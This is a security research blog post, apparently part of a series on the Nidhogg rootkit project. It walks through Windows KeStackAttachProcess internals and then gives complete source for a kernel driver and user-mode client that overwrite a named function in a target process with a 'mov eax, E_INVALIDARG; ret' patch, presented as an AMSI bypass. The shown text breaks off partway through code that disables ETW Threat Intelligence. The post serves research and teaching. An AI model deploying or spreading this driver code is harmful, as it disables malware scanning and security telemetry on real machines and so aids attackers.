Ido Veltzman :: Security Research

Prologue

In the last blog post, we learned about two common hooking methods (IRP Hooking and SSDT Hooking) and two different injection techniques from the kernel to the user mode for both shellcode and DLL (APC and CreateThread) with code snippets and examples from Nidhogg.

In this blog post, we will write a simple driver that bypasses AMSI to demonstrate patching user mode memory from the kernel, go through the credential dumping process from the kernel, and finish with tampering with various kernel callbacks as an example of patching kernel mode memory. Last but not least come the final words and the conclusion of this series.

Interacting With Usermode Memory

While there are a couple of methods for performing operations on user mode processes from kernel mode, in this part I will focus on one of the most common ones, which makes it easy: KeStackAttachProcess.

When interacting with a user mode process from a kernel driver, the driver author would like to have complete control over the process memory, whether for reading or for writing. When KeStackAttachProcess is used, the current kernel mode thread attaches to the process's address space, allowing it to access any memory inside the process. It is important to note that attaching to the process's address space can prevent async I/O from completing and might cause deadlocks. For this reason, it is very important to keep the code that runs while attached as simple as possible and to call KeUnstackDetachProcess as soon as possible.

NOTE: The following part is a deep dive into how the function works. If you want, you can skip to the Coding AMSI Bypass Driver part.

This part is dedicated to going through KeStackAttachProcess thoroughly. For the sake of simplicity, I will go through the interesting branch of attaching to a remote process and clean up some of the decompiled output. To give a little bit of background, KeStackAttachProcess is called with the EPROCESS of the process to attach to as the first parameter, and a pointer to a KAPC_STATE that saves the original state as the second parameter. The decompiled output below was produced on Windows 11 22H2 and may differ between Windows versions.

CurrentIrql = KeGetCurrentIrql();
__writecr8(DISPATCH_LEVEL);
if ( KiIrqlFlags && (KiIrqlFlags & 1) != 0 && CurrentIrql <= 0xFu )
{
  SchedulerAssist = KeGetCurrentPrcb()->SchedulerAssist;
  SchedulerAssist[5] |= (-1 << (CurrentIrql + 1)) & 4;
}
CurrentPrcb = KeGetCurrentPrcb();
v15 = 0;
v8 = CurrentPrcb->SchedulerAssist;
// ...
while ( _interlockedbittestandset64((volatile signed __int32 *)&CurrentThread->ThreadLock, 0LL) )
{
  // ...
  
  do
    KeYieldProcessorEx(&v15);
  while ( CurrentThread->ThreadLock );
  
  // ...
}

One of the first things done is saving the current IRQL and raising it to DISPATCH_LEVEL by writing to the CR8 register. This is done for synchronization: at DISPATCH_LEVEL no other thread can be scheduled on the current processor and interrupt this process. If you are interested in learning more about IRQLs, please refer to this article by Offsec that explains more about the subject.

Later on, it spins until it manages to set the first bit of the current thread's ThreadLock, to ensure that no other thread interferes with the current thread. Note that it uses _interlockedbittestandset64, an atomic operation, so testing the bit and setting it happen as a single step and only one contender can win the lock.

KeYieldProcessorEx is also part of the synchronization: it is called while waiting for the lock to be released, hinting to the processor that the current thread is busy-waiting before the operation mentioned above is retried. After this code block, CurrentThread->ApcStateIndex is checked to determine how to call KiAttachProcess. If ApcStateIndex is nonzero, the thread is already running in an attached process context; the first time a thread attempts to attach to the target process it is 0, and extra work is required to save the original state.
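
The lock acquisition described above can be sketched in user mode with std::atomic. This is only an illustration of the bit-test-and-set spin pattern: FakeThread, BitTestAndSet0, AcquireThreadLock and ReleaseThreadLock are made-up names, and the real kernel code also runs at DISPATCH_LEVEL and uses a processor yield hint inside the inner loop.

```cpp
#include <atomic>
#include <cassert>
#include <cstdint>

// User-mode stand-in for the ThreadLock field; this is not the real KTHREAD layout.
struct FakeThread {
    std::atomic<std::uint64_t> ThreadLock{0};
};

// Atomically sets bit 0 and reports whether it was already set,
// which is the contract of an interlocked bit-test-and-set.
inline bool BitTestAndSet0(std::atomic<std::uint64_t>& word) {
    return (word.fetch_or(1, std::memory_order_acquire) & 1) != 0;
}

// Spins until this caller is the one that flipped bit 0 from 0 to 1.
inline void AcquireThreadLock(FakeThread& thread) {
    while (BitTestAndSet0(thread.ThreadLock)) {
        // Someone else owns the lock: wait with plain reads until it looks
        // free, then retry the atomic operation in the outer loop.
        while (thread.ThreadLock.load(std::memory_order_relaxed) != 0) {
            // A real implementation would issue a pause/yield hint here.
        }
    }
}

// Clears bit 0 so that another contender can take the lock.
inline void ReleaseThreadLock(FakeThread& thread) {
    thread.ThreadLock.fetch_and(~std::uint64_t{1}, std::memory_order_release);
}
```

Splitting the wait into an atomic attempt and a read-only inner loop mirrors the shape of the decompiled code, where the inner loop only reads ThreadLock.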

currentApcState = &currentThread->152;
currentSavedApcState = &currentThread->600;
currentThread->SavedApcState.Process = currentThread->ApcState.Process;
currentThread->SavedApcState.InProgressFlags = currentThread->ApcState.InProgressFlags;
currentThread->SavedApcState.KernelApcPending = currentThread->ApcState.KernelApcPending;
currentThread->SavedApcState.UserApcPendingAll = currentThread->ApcState.UserApcPendingAll;
v13 = currentThread->ApcState.ApcListHead[0].Flink;
if ( ($871919957987849CFE33C84F378E5D13 *)currentApcState->ApcState.ApcListHead[0].Flink == currentApcState )
{
  currentThread->SavedApcState.ApcListHead[0].Blink = currentThread->SavedApcState.ApcListHead;
  currentSavedApcState->SavedApcState.ApcListHead[0].Flink = (_LIST_ENTRY *)currentSavedApcState;
  currentThread->SavedApcState.KernelApcPending = 0;
}
else
{
  v27 = currentThread->ApcState.ApcListHead[0].Blink;
  currentSavedApcState->SavedApcState.ApcListHead[0].Flink = v13;
  currentThread->SavedApcState.ApcListHead[0].Blink = v27;
  v13->Blink = (_LIST_ENTRY *)currentSavedApcState;
  v27->Flink = (_LIST_ENTRY *)currentSavedApcState;
}
v14 = (struct _KTHREAD *)currentThread->ApcState.ApcListHead[1].Flink;
v15 = &currentThread->SavedApcState.ApcListHead[1];
if ( v14 == (struct _KTHREAD *)&currentThread->ApcStateFill[16] )
{
  currentThread->SavedApcState.ApcListHead[1].Blink = &currentThread->SavedApcState.ApcListHead[1];
  v15->Flink = v15;
  currentThread->SavedApcState.UserApcPendingAll = 0;
}
else
{
  v25 = currentThread->ApcState.ApcListHead[1].Blink;
  v15->Flink = (_LIST_ENTRY *)v14;
  currentThread->SavedApcState.ApcListHead[1].Blink = v25;
  v14->Header.WaitListHead.Flink = v15;
  v25->Flink = v15;
}
currentThread->ApcState.ApcListHead[0].Blink = currentThread->ApcState.ApcListHead;
currentThread->ApcState.ApcListHead[1].Blink = &currentThread->ApcState.ApcListHead[1];
currentThread->ApcState.ApcListHead[1].Flink = &currentThread->ApcState.ApcListHead[1];
currentApcState->ApcState.ApcListHead[0].Flink = (_LIST_ENTRY *)currentApcState;
currentThread->ApcStateIndex = 1;
*(_WORD *)&currentThread->ApcStateFill[40] = 0;
currentThread->ApcState.UserApcPendingAll = 0;

if ( ... && (_InterlockedExchangeAdd(&Process->Pcb.StackCount.Value, 8u) & 7) != 0 )// Increase stack count
{
 ...
}

Once the thread is synchronized, it can use the SavedApcState structure to store the previous APC information such as flags, pointers, lists, etc. Once the APC state is saved, the lists in the thread's own ApcState are reset to empty and ApcStateIndex is set to 1. Lastly, Process->Pcb.StackCount.Value is incremented by 8 and the low three bits of its previous value are tested; depending on that check, it will release the lock and then go through a process similar to the thread lock acquisition described above.
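
The arithmetic behind the StackCount check can be shown in isolation. The sketch below assumes, purely for illustration, that the low three bits of the value carry a separate state field and the remaining bits carry a counter, which is why the increment is 8; the names are hypothetical and the meaning of the state bits is not taken from the decompiled output.

```cpp
#include <atomic>
#include <cassert>
#include <cstdint>

// Assumption for illustration: low three bits = state, upper bits = counter,
// so a single counter step equals 8.
constexpr std::uint32_t kStateMask = 7;
constexpr std::uint32_t kCountStep = 8;

// Mirrors _InterlockedExchangeAdd: adds 8 and returns the value from
// before the addition.
inline std::uint32_t IncrementStackCount(std::atomic<std::uint32_t>& value) {
    return value.fetch_add(kCountStep);
}

// Extracts the low three bits, the part tested by "& 7" in the decompiled code.
inline std::uint32_t StateBits(std::uint32_t value) { return value & kStateMask; }

// Extracts the counter stored above the three state bits.
inline std::uint32_t Count(std::uint32_t value) { return value >> 3; }
```

Because the step is a multiple of 8, the addition never disturbs the low three bits, so the check on the previous value and the counter update cannot interfere with each other.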

if ( KiKvaShadow )
{
  v22 = Process->DirectoryTableBase;
  if ( (DirectoryTableBase & 2) != 0 )
    v22 = DirectoryTableBase | 0x8000000000000000uLL;
  __writegsqword(0x9000u, v22);
  KiSetAddressPolicy(Process->AddressPolicy);
}
result = (unsigned int)HvlEnlightenments;
if ( (HvlEnlightenments & 1) != 0 )
  result = HvlSwitchVirtualAddressSpace(DirectoryTableBase);
else
  __writecr3(DirectoryTableBase);
if ( !KiFlushPcid && KiKvaShadow )
{
  v36 = __readcr4();
  if ( (v36 & 0x20080) != 0 ) // Check if PGE is enabled or not
  {
    result = v36 ^ 0x80;
    __writecr4(v36 ^ 0x80);
    __writecr4(v36);
  }
  else
  {
    result = __readcr3();
    __writecr3(result);
  }
}

For the final part, there is a check whether KVA Shadow (Kernel Virtual Address Shadow, explained in detail here), which was introduced as a mitigation against side-channel attacks such as Meltdown, is enabled; if so, the protection is applied accordingly.

Then, another check is performed to see whether VBS (Virtualization-Based Security) is enabled on the system. If so, the address space switch is performed in VTL1 (if you are interested in why this check is performed, please check Connor McGarr’s great article on the matter). If VBS isn't enabled, the CR3 register is written directly (the CR3 register holds the page directory base address, which the processor uses to translate virtual addresses to physical ones). I won't go into detail about the latter part as it is a performance improvement (as far as I'm aware, KiFlushPcid is a feature that avoids flushing all TLB entries each time CR3 changes).

Once this is done, the current thread runs with access to the address space of the remote process.
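
The 0x20080 mask in the decompiled output above can be decoded into individual CR4 bits. The sketch below assumes the architectural x86-64 bit positions (PGE at bit 7, PCIDE at bit 17); the helper names are made up for illustration and nothing here touches a real control register.

```cpp
#include <cassert>
#include <cstdint>

constexpr std::uint64_t kCr4Pge   = 1ull << 7;   // Page Global Enable
constexpr std::uint64_t kCr4Pcide = 1ull << 17;  // PCID Enable

// The decompiled mask is exactly these two bits combined.
static_assert((kCr4Pge | kCr4Pcide) == 0x20080, "mask should be PGE | PCIDE");

// True when the decompiled code would take the "toggle CR4" branch
// instead of the "rewrite CR3" branch.
inline bool TakesCr4TogglePath(std::uint64_t cr4) {
    return (cr4 & (kCr4Pge | kCr4Pcide)) != 0;
}

// Equivalent of "v36 ^ 0x80": flips only the PGE bit.
inline std::uint64_t TogglePge(std::uint64_t cr4) {
    return cr4 ^ kCr4Pge;
}
```

Read this way, the branch writes CR4 with the PGE bit flipped and then writes the original value back, while the other branch reloads CR3 with its current value.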

Coding AMSI Bypass Driver

To code the AMSI bypass driver, we will utilize the knowledge accumulated in the previous section to attach to the remote process and modify its memory. For a more complete implementation of patching user mode memory, please look at Nidhogg’s implementation.

First, we will start with the regular definitions of the driver entry and unloading functions:

#define DRIVER_PREFIX "Patcher: "
#define DRIVER_DEVICE_NAME L"\\Device\\Patcher"
#define DRIVER_SYMBOLIC_LINK L"\\??\\Patcher"

// Forward declarations of the routines registered in DriverEntry.
void PatcherUnload(PDRIVER_OBJECT DriverObject);
NTSTATUS PatcherCreateClose(PDEVICE_OBJECT DeviceObject, PIRP Irp);
NTSTATUS PatcherWrite(PDEVICE_OBJECT DeviceObject, PIRP Irp);

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
	UNREFERENCED_PARAMETER(RegistryPath);
	NTSTATUS status = STATUS_SUCCESS;
	PDEVICE_OBJECT DeviceObject = nullptr;

	UNICODE_STRING deviceName = RTL_CONSTANT_STRING(DRIVER_DEVICE_NAME);
	UNICODE_STRING symbolicLink = RTL_CONSTANT_STRING(DRIVER_SYMBOLIC_LINK);

	// Creating device and symbolic link.
	status = IoCreateDevice(DriverObject, 0, &deviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &DeviceObject);

	if (!NT_SUCCESS(status)) {
		KdPrint((DRIVER_PREFIX "Failed to create device: (0x%08X)\n", status));
		return status;
	}

	// PatcherWrite reads Irp->AssociatedIrp.SystemBuffer, which is only filled for buffered I/O.
	DeviceObject->Flags |= DO_BUFFERED_IO;

	status = IoCreateSymbolicLink(&symbolicLink, &deviceName);

	if (!NT_SUCCESS(status)) {
		KdPrint((DRIVER_PREFIX "Failed to create symbolic link: (0x%08X)\n", status));
		IoDeleteDevice(DeviceObject);
		return status;
	}

	DriverObject->DriverUnload = PatcherUnload;
	DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverObject->MajorFunction[IRP_MJ_CLOSE] = PatcherCreateClose;
	DriverObject->MajorFunction[IRP_MJ_WRITE] = PatcherWrite;
	return status;
}

NTSTATUS PatcherCreateClose(PDEVICE_OBJECT, PIRP Irp) {
	Irp->IoStatus.Status = STATUS_SUCCESS;
	Irp->IoStatus.Information = 0;
	IoCompleteRequest(Irp, IO_NO_INCREMENT);
	return STATUS_SUCCESS;
}

void PatcherUnload(PDRIVER_OBJECT DriverObject) {
	KdPrint((DRIVER_PREFIX "Unloading...\n"));

	UNICODE_STRING symbolicLink = RTL_CONSTANT_STRING(DRIVER_SYMBOLIC_LINK);
	IoDeleteSymbolicLink(&symbolicLink);
	IoDeleteDevice(DriverObject->DeviceObject);
}

For the Patch function, we will get a structure named PatchInformation that is defined as so:

struct PatchInformation {
	ULONG Pid;
	PVOID Patch;
	ULONG PatchLength;
	CHAR* FunctionName;
	WCHAR* ModuleName;
};

Now, let's define and go through the Patch function:

NTSTATUS PatchModule(PatchInformation* PatchInfo) {
	PEPROCESS TargetProcess;
	KAPC_STATE state;
	PVOID functionAddress = NULL;
	PVOID moduleImageBase = NULL;
	WCHAR* moduleName = NULL;
	CHAR* functionName = NULL;
	NTSTATUS status = STATUS_UNSUCCESSFUL;

	// Copying the values to local variables before they become inaccessible because of KeStackAttachProcess.
	SIZE_T moduleNameSize = (wcslen(PatchInfo->ModuleName) + 1) * sizeof(WCHAR);
	MemoryAllocator<WCHAR*> moduleNameAllocator(&moduleName, moduleNameSize);
	status = moduleNameAllocator.CopyData(PatchInfo->ModuleName, moduleNameSize);

	if (!NT_SUCCESS(status))
		return status;

	// The function name is a narrow string, so its size is measured with strlen.
	SIZE_T functionNameSize = strlen(PatchInfo->FunctionName) + 1;
	MemoryAllocator<CHAR*> functionNameAllocator(&functionName, functionNameSize);
	status = functionNameAllocator.CopyData(PatchInfo->FunctionName, functionNameSize);

	if (!NT_SUCCESS(status))
		return status;

	status = PsLookupProcessByProcessId((HANDLE)(ULONG_PTR)PatchInfo->Pid, &TargetProcess);

	if (!NT_SUCCESS(status))
		return status;

	// Attaching to the target process to resolve the module base and the function address.
	KeStackAttachProcess(TargetProcess, &state);
	moduleImageBase = GetModuleBase(TargetProcess, moduleName);

	if (!moduleImageBase) {
		KeUnstackDetachProcess(&state);
		ObDereferenceObject(TargetProcess);
		return STATUS_UNSUCCESSFUL;
	}

	functionAddress = GetFunctionAddress(moduleImageBase, functionName);

	if (!functionAddress) {
		KeUnstackDetachProcess(&state);
		ObDereferenceObject(TargetProcess);
		return STATUS_UNSUCCESSFUL;
	}
	KeUnstackDetachProcess(&state);

	// Writing the patch over the resolved function, from outside the attached context.
	status = KeWriteProcessMemory(PatchInfo->Patch, TargetProcess, functionAddress, (SIZE_T)PatchInfo->PatchLength, KernelMode);
	ObDereferenceObject(TargetProcess);
	return status;
}

The definition of MemoryAllocator can be found here; I will not go through it, to stay focused on the subject. The first thing done is copying the parameters to local variables so that they remain accessible after KeStackAttachProcess is executed (they would not be accessible otherwise because the thread then runs in the target process's address space, as explained in the previous section). Afterwards, the EPROCESS structure of the target process is looked up, and if such a process exists the current thread attaches to it.

The function GetModuleBase gets the PEB of the process and searches its InLoadOrderModuleList for the base address of the given module name, in this case the module that the user provided for patching.

PVOID moduleBase = NULL;
LARGE_INTEGER time = { 0 };
time.QuadPart = -100ll * 10 * 1000;

PREALPEB targetPeb = (PREALPEB)PsGetProcessPeb(Process);

if (!targetPeb)
	return moduleBase;

for (int i = 0; !targetPeb->LoaderData && i < 10; i++) {
	KeDelayExecutionThread(KernelMode, FALSE, &time);
}

if (!targetPeb->LoaderData)
	return moduleBase;

// Getting the module's image base.
for (PLIST_ENTRY pListEntry = targetPeb->LoaderData->InLoadOrderModuleList.Flink;
	pListEntry != &targetPeb->LoaderData->InLoadOrderModuleList;
	pListEntry = pListEntry->Flink) {

	PLDR_DATA_TABLE_ENTRY pEntry = CONTAINING_RECORD(pListEntry, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);

	if (pEntry->FullDllName.Length > 0) {
		if (IsIContained(pEntry->FullDllName, moduleName)) {
			moduleBase = pEntry->DllBase;
			break;
		}
	}
}

return moduleBase;
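
The list walk in GetModuleBase can be reproduced in user mode on a synthetic list. The sketch below is a simplified model, not the real loader structures: ListEntry, FakeLdrEntry, InsertTail and FindModuleBase are made-up names, and ContainsNoCase is only a hypothetical stand-in for IsIContained, whose actual behavior is not shown in this post.

```cpp
#include <cassert>
#include <cstddef>
#include <cwctype>
#include <string>

// Minimal stand-ins; the real LDR_DATA_TABLE_ENTRY has many more fields.
struct ListEntry {
    ListEntry* Flink;
    ListEntry* Blink;
};

struct FakeLdrEntry {
    void* DllBase;
    const wchar_t* FullDllName;
    ListEntry InLoadOrderLinks;  // deliberately not the first member
};

// Same idea as CONTAINING_RECORD: step back from the embedded link to its owner.
inline FakeLdrEntry* EntryFromLink(ListEntry* link) {
    return reinterpret_cast<FakeLdrEntry*>(
        reinterpret_cast<char*>(link) - offsetof(FakeLdrEntry, InLoadOrderLinks));
}

// Appends an entry at the end of a circular list that uses head as sentinel.
inline void InsertTail(ListEntry* head, ListEntry* entry) {
    entry->Flink = head;
    entry->Blink = head->Blink;
    head->Blink->Flink = entry;
    head->Blink = entry;
}

// Case-insensitive substring check (hypothetical stand-in for IsIContained).
inline bool ContainsNoCase(const std::wstring& haystack, const std::wstring& needle) {
    auto lower = [](std::wstring s) {
        for (auto& c : s) c = static_cast<wchar_t>(std::towlower(c));
        return s;
    };
    return lower(haystack).find(lower(needle)) != std::wstring::npos;
}

// Walks from head->Flink until the walk returns to the sentinel head.
inline void* FindModuleBase(ListEntry* head, const std::wstring& moduleName) {
    for (ListEntry* link = head->Flink; link != head; link = link->Flink) {
        FakeLdrEntry* entry = EntryFromLink(link);
        if (entry->FullDllName && ContainsNoCase(entry->FullDllName, moduleName))
            return entry->DllBase;
    }
    return nullptr;
}
```

The important detail is that the list links are embedded in the middle of each entry, so every node pointer has to be converted back to its containing record before any field is read.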

Next, the GetFunctionAddress is called to iterate the export table of that module and search for a specific function within it.

PVOID functionAddress = NULL;
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)moduleBase;

if (!dosHeader)
	return functionAddress;

// Checking that the image is valid PE file.
if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE)
	return functionAddress;

PFULL_IMAGE_NT_HEADERS ntHeaders = (PFULL_IMAGE_NT_HEADERS)((PUCHAR)moduleBase + dosHeader->e_lfanew);

if (ntHeaders->Signature != IMAGE_NT_SIGNATURE)
	return functionAddress;

IMAGE_OPTIONAL_HEADER optionalHeader = ntHeaders->OptionalHeader;

if (optionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress == 0)
	return functionAddress;

// Iterating the export directory.
PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PUCHAR)moduleBase + optionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

DWORD* addresses = (DWORD*)((PUCHAR)moduleBase + exportDirectory->AddressOfFunctions);
WORD* ordinals = (WORD*)((PUCHAR)moduleBase + exportDirectory->AddressOfNameOrdinals);
DWORD* names = (DWORD*)((PUCHAR)moduleBase + exportDirectory->AddressOfNames);

for (DWORD j = 0; j < exportDirectory->NumberOfNames; j++) {
	if (_stricmp((char*)((PUCHAR)moduleBase + names[j]), functionName) == 0) {
		functionAddress = (PUCHAR)moduleBase + addresses[ordinals[j]];
		break;
	}
}

return functionAddress;
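
The double indirection in the export lookup (name index to ordinal, ordinal to address) is easy to get wrong, so here is a reduced model of it. FakeExports and FindExportRva are hypothetical names, the three tables are plain vectors instead of RVAs inside a mapped image, and the comparison is case-sensitive for simplicity whereas the code above uses _stricmp.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Simplified view of an export directory: three parallel tables.
struct FakeExports {
    std::vector<const char*> names;        // AddressOfNames (already resolved to strings)
    std::vector<std::uint16_t> ordinals;   // AddressOfNameOrdinals
    std::vector<std::uint32_t> addresses;  // AddressOfFunctions (RVAs)
};

// Returns the RVA for name, or 0 when the function is not exported by name.
inline std::uint32_t FindExportRva(const FakeExports& exports, const char* name) {
    for (std::size_t j = 0; j < exports.names.size(); j++) {
        if (std::strcmp(exports.names[j], name) == 0) {
            // names[j] pairs with ordinals[j]; the ordinal then indexes
            // the address table, which has its own independent order.
            return exports.addresses[exports.ordinals[j]];
        }
    }
    return 0;
}
```

In the example data used to exercise this, the first name maps to the third address, which shows why indexing the address table directly with the name index would return the wrong function.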

Once the function address is obtained, it can be patched using the KeWriteProcessMemory function, which overwrites it with the given patch.

NTSTATUS KeWriteProcessMemory(PVOID sourceDataAddress, PEPROCESS TargetProcess, PVOID targetAddress, SIZE_T dataSize, MODE mode) {
	HANDLE hTargetProcess;
	ULONG oldProtection;
	SIZE_T patchLen;
	SIZE_T bytesWritten;
	NTSTATUS status = STATUS_SUCCESS;

	if (mode != KernelMode && mode != UserMode)
		return STATUS_UNSUCCESSFUL;

	// Making sure that the given kernel mode address is valid.
	if (mode == KernelMode && (!VALID_KERNELMODE_MEMORY((DWORD64)sourceDataAddress) || !VALID_ADDRESS((DWORD64)targetAddress))) {
		status = STATUS_UNSUCCESSFUL;
		return status;
	}
	else if (mode == UserMode && (!VALID_USERMODE_MEMORY((DWORD64)sourceDataAddress) || !VALID_ADDRESS((DWORD64)targetAddress))) {
		status = STATUS_UNSUCCESSFUL;
		return status;
	}

	// Adding write permissions.
	status = ObOpenObjectByPointer(TargetProcess, OBJ_KERNEL_HANDLE, NULL, PROCESS_ALL_ACCESS, *PsProcessType, (KPROCESSOR_MODE)mode, &hTargetProcess);

	if (!NT_SUCCESS(status)) {
		return status;
	}

	patchLen = dataSize;
	PVOID addressToProtect = targetAddress;
	status = ZwProtectVirtualMemory(hTargetProcess, &addressToProtect, &patchLen, PAGE_READWRITE, &oldProtection);

	if (!NT_SUCCESS(status)) {
		ZwClose(hTargetProcess);
		return status;
	}
	ZwClose(hTargetProcess);

	// Writing the data.
	status = MmCopyVirtualMemory(PsGetCurrentProcess(), sourceDataAddress, TargetProcess, targetAddress, dataSize, KernelMode, &bytesWritten);

	// Restoring permissions and cleaning up.
	if (ObOpenObjectByPointer(TargetProcess, OBJ_KERNEL_HANDLE, NULL, PROCESS_ALL_ACCESS, *PsProcessType, (KPROCESSOR_MODE)mode, &hTargetProcess) == STATUS_SUCCESS) {
		patchLen = dataSize;
		ZwProtectVirtualMemory(hTargetProcess, &addressToProtect, &patchLen, oldProtection, &oldProtection);
		ZwClose(hTargetProcess);
	}

	return status;
}

KeWriteProcessMemory does several things. First, the given source and destination addresses are checked for validity. Then, a handle to the process is acquired through ObOpenObjectByPointer using the EPROCESS given as a parameter, and the protection is changed to PAGE_READWRITE to ensure there are write permissions. Finally, the data is copied using MmCopyVirtualMemory and the original protection is restored.

To finish, we need to implement a function that receives the user input:

NTSTATUS PatcherWrite(PDEVICE_OBJECT, PIRP Irp) {
	PatchInformation patchedModule{};
	NTSTATUS status = STATUS_SUCCESS;
	SIZE_T len = 0;
	auto stack = IoGetCurrentIrpStackLocation(Irp);

	// A single-pass loop so every failure can break out to the common completion code below.
	do {
		// For IRP_MJ_WRITE the buffer length is stored in Parameters.Write.
		auto size = stack->Parameters.Write.Length;

		if (size == 0 || size % sizeof(PatchInformation) != 0) {
			status = STATUS_INVALID_BUFFER_SIZE;
			break;
		}

		auto data = (PatchInformation*)Irp->AssociatedIrp.SystemBuffer;
		patchedModule.Pid = data->Pid;
		patchedModule.PatchLength = data->PatchLength;

		// Sizes include the null terminator because PatchModule measures the strings again.
		SIZE_T strSize = strlen(data->FunctionName) + 1;
		MemoryAllocator<CHAR*> functionNameAllocator(&patchedModule.FunctionName, strSize);
		status = functionNameAllocator.CopyData(data->FunctionName, strSize);

		if (!NT_SUCCESS(status))
			break;

		strSize = (wcslen(data->ModuleName) + 1) * sizeof(WCHAR);
		MemoryAllocator<WCHAR*> moduleNameAllocator(&patchedModule.ModuleName, strSize);
		status = moduleNameAllocator.CopyData(data->ModuleName, strSize);

		if (!NT_SUCCESS(status))
			break;

		MemoryAllocator<PVOID> patchAllocator(&patchedModule.Patch, data->PatchLength);
		status = patchAllocator.CopyData(data->Patch, data->PatchLength);

		if (!NT_SUCCESS(status))
			break;

		if (data->Pid <= 4) {
			KdPrint((DRIVER_PREFIX "Invalid PID.\n"));
			status = STATUS_INVALID_PARAMETER;
			break;
		}
		status = PatchModule(&patchedModule);

		if (NT_SUCCESS(status))
			len += sizeof(PatchInformation);
	} while (false);

	Irp->IoStatus.Status = status;
	Irp->IoStatus.Information = len;
	IoCompleteRequest(Irp, IO_NO_INCREMENT);
	return status;
}

And for the user mode side:

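#include <windows.h>
#include <iostream>
#include <string>
#include <vector>

constexpr DWORD SYSTEM_PID = 4;

// Illustrative usage: client.exe <pid> <module name> <function name>
// PatchInformation must match the driver's definition shown earlier.
int main(int argc, char* argv[]) {
	if (argc != 4)
		return 1;

	DWORD bytesWritten = 0;
	// mov eax, 0x80070057 (E_INVALIDARG); ret
	std::vector<BYTE> patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };

	DWORD pid = std::stoul(argv[1]);
	std::string moduleArg = argv[2];
	std::wstring moduleName(moduleArg.begin(), moduleArg.end()); // ASCII-only widening
	CHAR* functionName = argv[3];

	// Opening the device through the symbolic link created in DriverEntry.
	HANDLE hDrv = CreateFileW(L"\\\\.\\Patcher", GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);

	if (hDrv == INVALID_HANDLE_VALUE)
		return 1;

	PatchInformation patchedModule{};

	patchedModule.Pid = pid;
	patchedModule.PatchLength = (ULONG)patch.size();
	patchedModule.ModuleName = &moduleName[0];
	patchedModule.FunctionName = functionName;
	patchedModule.Patch = patch.data();

	if (pid <= SYSTEM_PID || patchedModule.ModuleName == nullptr ||
		patchedModule.FunctionName == nullptr || patchedModule.Patch == nullptr) {
		CloseHandle(hDrv);
		return 1;
	}

	BOOL result = WriteFile(hDrv, &patchedModule, sizeof(patchedModule), &bytesWritten, NULL);

	if (result)
		std::cout << "Patched!" << std::endl;
	else
		std::cout << "Failed to patch" << std::endl;

	CloseHandle(hDrv);
	return result ? 0 : 1;
}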
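
To make the six patch bytes less opaque, the sketch below decodes them. It only recognizes the exact shape used here (opcode B8 followed by a 32-bit little-endian immediate and a C3 return); DecodedPatch, ReadLe32 and DecodePatch are illustrative names and this is not a general disassembler.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Reads a 32-bit little-endian value from four consecutive bytes.
inline std::uint32_t ReadLe32(const std::uint8_t* bytes) {
    return std::uint32_t{bytes[0]} | (std::uint32_t{bytes[1]} << 8) |
           (std::uint32_t{bytes[2]} << 16) | (std::uint32_t{bytes[3]} << 24);
}

struct DecodedPatch {
    bool isMovEaxRet;           // true when the bytes are "mov eax, imm32; ret"
    std::uint32_t returnValue;  // the immediate loaded into eax
};

// Recognizes exactly the 6-byte sequence "B8 imm32 C3".
inline DecodedPatch DecodePatch(const std::uint8_t* bytes, std::size_t length) {
    if (length == 6 && bytes[0] == 0xB8 && bytes[5] == 0xC3)
        return {true, ReadLe32(bytes + 1)};
    return {false, 0};
}
```

For the bytes used above, the immediate decodes to 0x80070057, so a function that starts with this patch returns that value immediately without running its original body.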

Interacting With Kernel Memory

Interacting with kernel mode memory differs from interacting with user mode memory in some ways. One is that there is no need to attach to a different process to access memory; another is that the main limitation is Kernel Patch Protection (PatchGuard). There are several deep dive articles about PatchGuard (and I also explained a little about it in my talk), so I won't go too deep into it. Generally speaking, PatchGuard protects certain critical objects (tables, lists, registers, etc.) and scans the system periodically (the interval is randomly generated on each boot); if it finds a mismatch, it crashes the system with error code 0x109 (CRITICAL_STRUCTURE_CORRUPTION). The full list of protected objects is available in MSDN.

Other than that, modifying kernel objects causes no issues (if done correctly) and will not crash the system. An example is enabling / disabling ETW-TI:

NTSTATUS EnableDisableEtwTI(bool enable) {
	NTSTATUS status = STATUS_SUCCESS;
	EX_PUSH_LOCK etwThreatIntLock = NULL;
	ULONG foundIndex = 0;
	SIZE_T bytesWritten = 0;
	SIZE_T etwThreatIntProvRegHandleSigLen = sizeof(EtwThreatIntProvRegHandleSignature1);

	// Getting the location of KeInsertQueueApc dynamically to get the real location.
	UNICODE_STRING routineName = RTL_CONSTANT_STRING(L"KeInsertQueueApc");
	PVOID searchedRoutineAddress = MmGetSystemRoutineAddress(&routineName);

	if (!searchedRoutineAddress)
		return STATUS_NOT_FOUND;

	SIZE_T targetFunctionDistance = EtwThreatIntProvRegHandleDistance;
	PLONG searchedRoutineOffset = (PLONG)FindPattern((PUCHAR)&EtwThreatIntProvRegHandleSignature1,
		0xCC, etwThreatIntProvRegHandleSigLen - 1,
		searchedRoutineAddress, targetFunctionDistance,
		&foundIndex, (ULONG)etwThreatIntProvRegHandleSigLen);

	if (!searchedRoutineOffset) {
		searchedRoutineOffset = (PLONG)FindPattern((PUCHAR)&EtwThreatIntProvRegHandleSignature2,
			0xCC, etwThreatIntProvRegHandleSigLen - 1,
			searchedRoutineAddress, targetFunctionDistance,
			&foundIndex, (ULONG)etwThreatIntProvRegHandleSigLen);

		if (!searchedRoutineOffset)
			return STATUS_NOT_FOUND;
	}
	PUCHAR etwThreatIntProvRegHandle = (PUCHAR)searchedRoutineAddress + (*searchedRoutineOffset) + foundIndex + EtwThreatIntProvRegHandleOffset;
	ULONG enableProviderInfoOffset = GetEtwProviderEnableInfoOffset();

